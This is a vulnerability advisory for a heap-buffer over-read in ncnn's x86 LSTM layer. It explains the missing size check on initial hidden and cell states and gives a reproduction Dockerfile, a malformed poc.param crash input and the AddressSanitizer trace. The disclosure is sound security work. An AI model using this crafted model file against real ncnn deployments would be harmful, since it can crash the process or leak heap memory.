LSTM Hidden-State Buffer Over-Read
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/lstm_x86.cpp:398 in lstm
Sanitizer verdict: heap-buffer-overflow
Summary
When an LSTM layer is given the optional initial hidden and cell states as extra input blobs, LSTM_x86::forward() clones them without checking their size against the layer's declared num_output. A model that declares num_output = 32 while wiring in a one-element hidden state makes the recurrence read 32 floats out of a 4-byte tensor, pulling adjacent heap contents into the gate accumulation and aborting the process. The PoC needs no weights at all: ncnnoptimize is invoked with a null bin file and crashes during ModelWriter::shape_inference().
Detail
LSTM::load_param() reads num_output from param id 0 and hidden_size from param id 3, and the three-input form of LSTM_x86::forward() takes the initial states verbatim from the graph:
// src/layer/x86/lstm_x86.cpp:656
if (bottom_blobs.size() == 3)
{
hidden = bottom_blobs[1].clone(hidden_cell_allocator);
cell = bottom_blobs[2].clone(hidden_cell_allocator);
}
else
{
hidden.create(num_output, num_directions, 4u, hidden_cell_allocator);
The else branch — used when the states are not supplied — sizes hidden as num_output floats per direction. The if branch performs no such check: clone() copies whatever shape the producing blob has. The cloned Mat is then passed as hidden_state into the static lstm() helper, whose inner loop bound is num_output:
// src/layer/x86/lstm_x86.cpp:392
const float* hidden_ptr = hidden_state;
i = 0;
#if __SSE2__
for (; i + 3 < num_output; i += 4)
{
__m128 _h_cont0 = _mm_load1_ps(hidden_ptr);
__m128 _h_cont1 = _mm_load1_ps(hidden_ptr + 1);
__m128 _h_cont2 = _mm_load1_ps(hidden_ptr + 2);
__m128 _h_cont3 = _mm_load1_ps(hidden_ptr + 3);
The PoC declares LSTM lstm 3 3 data hidden cell out hidden_out cell_out 0=32 1=4 2=0 3=1, i.e. num_output = 32, alongside Input hidden 0 1 hidden 0=1 — a one-element blob. ModelWriter::shape_inference() builds that input with Mat::create(1) and clone() reproduces it: 16 bytes of payload, a 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD tail make the 84-byte region in the report. The loop nevertheless scans hidden_ptr[0] through hidden_ptr[31] (128 bytes). Float index 21 sits at byte offset 84, the first address outside the allocation — reached by the _mm_load1_ps(hidden_ptr + 1) of the i = 20 iteration, which is the load AddressSanitizer traps.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-lstm-hidden-state-buffer-over-read && cd ncnn-poc-lstm-hidden-state-buffer-over-read
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_EOF'
7767517
4 7
Input data 0 1 data 0=1 1=1
Input hidden 0 1 hidden 0=1
Input cell 0 1 cell 0=1
LSTM lstm 3 3 data hidden cell out hidden_out cell_out 0=32 1=4 2=0 3=1
POC_EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e0000005d4 at pc 0x59cb1d93d67e bp 0x7ffe7a37d890 sp 0x7ffe7a37d880
READ of size 4 at 0x50e0000005d4 thread T0
#0 0x59cb1d93d67d in _mm_load1_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/xmmintrin.h:920
#1 0x59cb1d93d67d in lstm /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:399
#2 0x59cb1d95d866 in ncnn::LSTM_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:682
#3 0x59cb19ae070b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#4 0x59cb19ac8b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#5 0x59cb19b289e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#6 0x59cb199ba3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#7 0x59cb19a37eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#8 0x76227eeaa1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x76227eeaa28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x59cb199b7624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e0000005d4 is located 0 bytes after 84-byte region [0x50e000000580,0x50e0000005d4)
allocated by thread T0 here:
#0 0x76227f523f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x59cb19a4c68e in fastMalloc /ncnn/src/allocator.h:62
#2 0x59cb19a4c68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x59cb19a8a621 in ncnn::Mat::create(int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:497
#4 0x59cb19a70c14 in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:79
#5 0x59cb1d958a73 in ncnn::LSTM_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:658
#6 0x59cb19ae070b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#7 0x59cb19ac8b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#8 0x59cb19b289e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#9 0x59cb199ba3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#10 0x59cb19a37eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#11 0x76227eeaa1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x76227eeaa28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#13 0x59cb199b7624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/xmmintrin.h:920 in _mm_load1_ps(float const*)
Credit
Zheng Yu @ DepthFirst